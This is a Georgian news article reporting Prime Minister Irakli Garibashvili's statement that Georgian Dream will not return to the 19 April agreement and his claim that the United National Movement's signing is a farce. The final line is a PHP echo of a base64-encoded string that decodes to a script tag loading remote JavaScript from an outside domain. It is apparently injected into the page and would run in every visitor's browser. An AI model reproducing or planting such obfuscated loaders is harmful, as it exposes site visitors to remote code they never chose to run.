celsiusi
ავერსი შნაიდერი
პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, გამორიცხულია, რომ „ქართული ოცნება“ 19 აპრილის შეთანხმებას კვლავ დაუბრუნდეს. როგორც მან ჟურნალისტებს განუცხადა, „ნაციონალური მოძრაობის“ მხრიდან დოკუმენტზე ხელმოწერა ფარსი და ტყუილია.
 
„ეს არის ფარსი და სიყალბე. მათ ხელმოწერას ფასი ექნებოდა მაშინ, როდესაც ჩვენ ყველამ ერთად, ჩვენი დიდი მეგობრების, შარლ მიშელის, აშშ-ის ელჩის, აშშ-ის უშუალო მედიაციით დავასრულეთ ამ დოკუმენტზე მუშაობა. მაშინ ყველამ მოვაწერეთ ხელი ყველა იმ ფაქტორის გათვალისწინებით, რაც იმ კონკრეტულ მომენტში არსებობდა. მათ შეურაცხყოფა მიაყენეს მთელ საერთაშორისო საზოგადოებას, ჩვენს პარტნიორებს. წარმოიდგინეთ, ჩვენი სახელმწიფოსთვის ასეთი კომპრომისული ნაბიჯები გადავდგით, ყველაფერი გავაკეთეთ იმისთვის, რომ დამშვიდებულიყო სიტუაცია, იმისთვის, რომ პოლიტიკური შეთანხმება შემდგარიყო. ამაზე ნაწილობრივ წამოვიდნენ, გახსოვთ ალბათ, რომ ბოლო მომენტამდე პარლამენტში არ შემოდიოდნენ, იყო ჩვეულებრივი ბაზარში რომ არის ვაჭრობა, ასეთი ტიპის ვაჭრობა გამართეს ჩვენს ამერიკელ და ევროპელ მეგობრებთან. ამის მიუხედავად, ჩვენ ხელი მოვაწერეთ, ყველა ის რეფორმები, რაც დაწყებული გვქონდა და მის შემდეგ, გავაკეთეთ. ველოდეთ 100 დღე, მიუხედავად მოწოდებებისა, ევროპელი, ამერიკელი მეგობრების თხოვნის მიუხედავად,მათ იგნორირება მოახდინეს ჩვენი პარტნიორების და დოკუმეტს ხელი არ მოაწერეს. ეს არ არის საბავშვო ბაღი, პოლიტიკაა და პირველ რიგში, ქვეყნის, სახელმწიფოს და მოსახლეობის ინტერესებია. ამიტომ, ჩვენ ველოდით და ამის შემდეგ ანულირება მოვახდინეთ, გამოვედით ამ ხელშეკრულებიდან, იმიტომ, რომ ხელშეკრულება მხოლოდ და მხოლოდ იმ შემთხევვაში იქნებოდა ლეგიტიმური, როცა ორივე მხარე მოაწერდა ხელს. მას შემდეგ, რაც ჩვენ გამოვედით და ვთქვით, რომ თემა დახურულია, ასევე განვაცხადეთ, რომ ყველა რეფორმა გრძელდება. გამორიცხულია, „ქართული ოცნება“ ამ შეთანხმებას არ დაუბრუნდება! „ნაციონალური მოძრაობის“ მხრიდან ამის ხელმოწერა არის ფარსი და ტყუილი. შეურაცხყოფა არის ჩვენი პარტნიორების და მთლიანად საზოგადოების“, -განაცხადა ღარიბაშვილმა.
 
ცნობისთვის, „ერთიანმა ნაციონალურმა მოძრაობამ“ 19 აპრილის შეთანხმებას ხელი მოაწერა. პარტიის თავმჯდომარის, ნიკა მელიას განმარტებით, მიუხედავად 19 აპრილის დოკუმენტში პარტიისთვის მიუღებელი გარკვეული დებულებებისა, რის გამოც ამ დრომდე პოლიტიკურმა სუბიექტმა შეთანხმებას ხელი არ მოაწერა, "არსებული უმძიმესი სახელმწიფოებრივი რისკების შეფასების შემდეგ", შექმნილ მდგომარეობაში თავს ვალდებულად მიიჩნევენ საკუთარ მოსაზრებებზე მაღლა დადგნენ და 19 აპრილის შეთანხმებას ხელი მოაწერონ.
1113
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");